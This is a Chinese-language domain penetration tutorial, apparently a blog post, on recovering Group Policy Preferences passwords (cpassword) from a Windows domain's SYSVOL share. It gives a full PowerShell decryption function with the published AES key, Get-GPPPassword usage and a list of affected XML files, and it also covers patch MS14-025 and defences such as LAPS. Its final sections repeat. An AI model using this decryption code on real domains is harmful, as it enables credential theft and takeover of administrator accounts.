域渗透——利用SYSVOL还原组策略中保存的密码<\/h1>

0x00 概述<\/h2>
本文详细介绍了如何利用Windows域环境中的SYSVOL共享文件夹还原组策略中保存的密码。当域管理员使用组策略批量管理域内主机时，可能会将密码以加密形式存储在SYSVOL共享中，这些密码可以被任何域用户访问并解密，造成严重的安全隐患。<\/p>

0x01 SYSVOL共享介绍<\/h2>

SYSVOL是域控制器上的一个共享文件夹，路径为：\\<DOMAIN>\SYSVOL\<DOMAIN>\<\/code><\/p>

特点：<\/p>


所有域内主机都能访问<\/li>
保存组策略相关数据<\/li>
包含登录脚本、配置文件等<\/li>
默认权限允许所有域用户读取<\/li>
<\/ul>
0x02 组策略密码管理方法<\/h2>
Server 2003系统<\/h3>
管理员通常通过配置组策略执行VBS脚本来批量修改密码：<\/p>
strComputer = "."
Set objUser = GetObject("WinNT:\/\/" & strComputer & "\/Administrator, user")
objUser.SetPassword "domain123!"
objUser.SetInfo
<\/code><\/pre>
安全问题<\/strong>：<\/p>

密码明文保存在VBS脚本中<\/li>
脚本通常存放在SYSVOL共享<\/li>
任何域用户都能读取明文密码<\/li>
<\/ul>
Server 2008及更新系统<\/h3>
使用Group Policy Preferences配置组策略批量修改密码：<\/p>

创建GPO（组策略对象）<\/li>
在"用户配置"→"首选项"→"控制面板设置"→"本地用户和组"中设置<\/li>
更新Administrator账户密码<\/li>
设置策略权限<\/li>
<\/ol>
配置完成后，会在SYSVOL中生成XML配置文件，路径示例：

\\test.local\SYSVOL\test.local\Policies\{GPO_ID}\User\Preferences\Groups\Groups.xml<\/code><\/p>
0x03 密码加密与解密<\/h2>
加密机制<\/h3>
密码以cpassword属性存储在XML文件中，使用AES-256加密，例如：<\/p>
<cpassword<\/span>="9XLcz+Caj\/kyldECku6lQ1QJX3fe9gnshWkkWlgAN1U"<\/span>\/><\/span>
<\/span><\/span><\/code><\/pre>解密方法<\/h3>
微软公开了AES加密私钥，可以使用PowerShell解密：<\/p>
function<\/span> Get-DecryptedCpassword {
<\/span><\/span>    [CmdletBinding<\/span>()]
<\/span><\/span>    Param<\/span> (
<\/span><\/span>        [string]<\/span> $Cpassword 
<\/span><\/span>    )
<\/span><\/span>    
<\/span><\/span>    try<\/span> {
<\/span><\/span>        # 处理Base64字符串<\/span>
<\/span><\/span>        $Mod = ($Cpassword.length % 4)
<\/span><\/span>        switch<\/span> ($Mod) {
<\/span><\/span>            '1'<\/span> {$Cpassword = $Cpassword.Substring(0,$Cpassword.Length -1)}
<\/span><\/span>            '2'<\/span> {$Cpassword += ("="<\/span> * (4 - $Mod))}
<\/span><\/span>            '3'<\/span> {$Cpassword += ("="<\/span> * (4 - $Mod))}
<\/span><\/span>        }
<\/span><\/span>        
<\/span><\/span>        $Base64Decoded = [Convert]<\/span>::FromBase64String($Cpassword)
<\/span><\/span>        
<\/span><\/span>        # 创建AES解密对象<\/span>
<\/span><\/span>        $AesObject = New-Object System.Security.Cryptography.AesCryptoServiceProvider
<\/span><\/span>        [Byte[]]<\/span> $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
<\/span><\/span>                             0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)
<\/span><\/span>        $AesIV = New-Object Byte[]($AesObject.IV.Length)
<\/span><\/span>        $AesObject.IV = $AesIV
<\/span><\/span>        $AesObject.Key = $AesKey
<\/span><\/span>        
<\/span><\/span>        $DecryptorObject = $AesObject.CreateDecryptor()
<\/span><\/span>        [Byte[]]<\/span> $OutBlock = $DecryptorObject.TransformFinalBlock($Base64Decoded, 0, $Base64Decoded.length)
<\/span><\/span>        
<\/span><\/span>        return<\/span> [System.Text.UnicodeEncoding]<\/span>::Unicode.GetString($OutBlock)
<\/span><\/span>    }
<\/span><\/span>    catch<\/span> {Write-Error $Error[0]}
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>Get-DecryptedCpassword "9XLcz+Caj\/kyldECku6lQ1QJX3fe9gnshWkkWlgAN1U"<\/span>
<\/span><\/span><\/code><\/pre>自动化工具<\/h3>
可使用PowerSploit中的Get-GPPPassword.ps1脚本自动扫描SYSVOL并解密所有密码：<\/p>
Import-Module .\Get-GPPPassword.ps1
<\/span><\/span>Get-GPPPassword
<\/span><\/span><\/code><\/pre>0x04 其他可被利用的组策略位置<\/h2>
除了Groups.xml外，以下配置文件也可能包含cpassword：<\/p>

Services\Services.xml<\/li>
ScheduledTasks\ScheduledTasks.xml<\/li>
Printers\Printers.xml<\/li>
Drives\Drives.xml<\/li>
DataSources\DataSources.xml<\/li>
<\/ol>
注意<\/strong>：只有配置时需要输入密码的位置才会包含cpassword属性。<\/p>
0x05 微软补丁KB2962486<\/h2>
微软发布了补丁KB2962486（MS14-025）修复此问题：<\/p>

安装后，组策略中无法设置用户名密码<\/li>
XML文件中不再包含cpassword属性<\/li>
但XML文件仍会与组策略保持同步<\/li>
<\/ul>
0x06 防御建议<\/h2>


使用LAPS<\/strong>（Local Administrator Password Solution）：<\/p>

确保每台域内主机有不同的本地管理员密码<\/li>
密码定期自动更换<\/li>
<\/ul>
<\/li>

安装补丁KB2962486<\/strong>：<\/p>

防止在组策略中存储密码<\/li>
<\/ul>
<\/li>

避免在组策略中使用域控密码<\/strong>：<\/p>

特别是域管理员账户密码<\/li>
<\/ul>
<\/li>

限制SYSVOL访问权限<\/strong>：<\/p>

设置适当的共享权限和NTFS权限<\/li>
<\/ul>
<\/li>

使用PsPasswd工具<\/strong>：<\/p>

作为替代方案批量修改密码<\/li>
<\/ul>
<\/li>

定期审计<\/strong>：<\/p>

检查SYSVOL中是否包含敏感信息<\/li>
监控对SYSVOL的异常访问<\/li>
<\/ul>
<\/li>
<\/ol>
0x07 总结<\/h2>
通过SYSVOL共享还原组策略密码是一种有效的域渗透技术，利用的是组策略密码管理中的设计缺陷。防御的关键在于采用更安全的密码管理方案（如LAPS）、及时安装补丁，并严格控制共享文件夹的访问权限。<\/p>

域渗透——利用SYSVOL还原组策略中保存的密码<\/h1>

0x02 组策略密码管理方法<\/h2>

0x07 总结<\/h2> 通过SYSVOL共享还原组策略密码是一种有效的域渗透技术，利用的是组策略密码管理中的设计缺陷。防御的关键在于采用更安全的密码管理方案（如LAPS）、及时安装补丁，并严格控制共享文件夹的访问权限。<\/p>

0x07 总结<\/h2>
通过SYSVOL共享还原组策略密码是一种有效的域渗透技术，利用的是组策略密码管理中的设计缺陷。防御的关键在于采用更安全的密码管理方案（如LAPS）、及时安装补丁，并严格控制共享文件夹的访问权限。<\/p>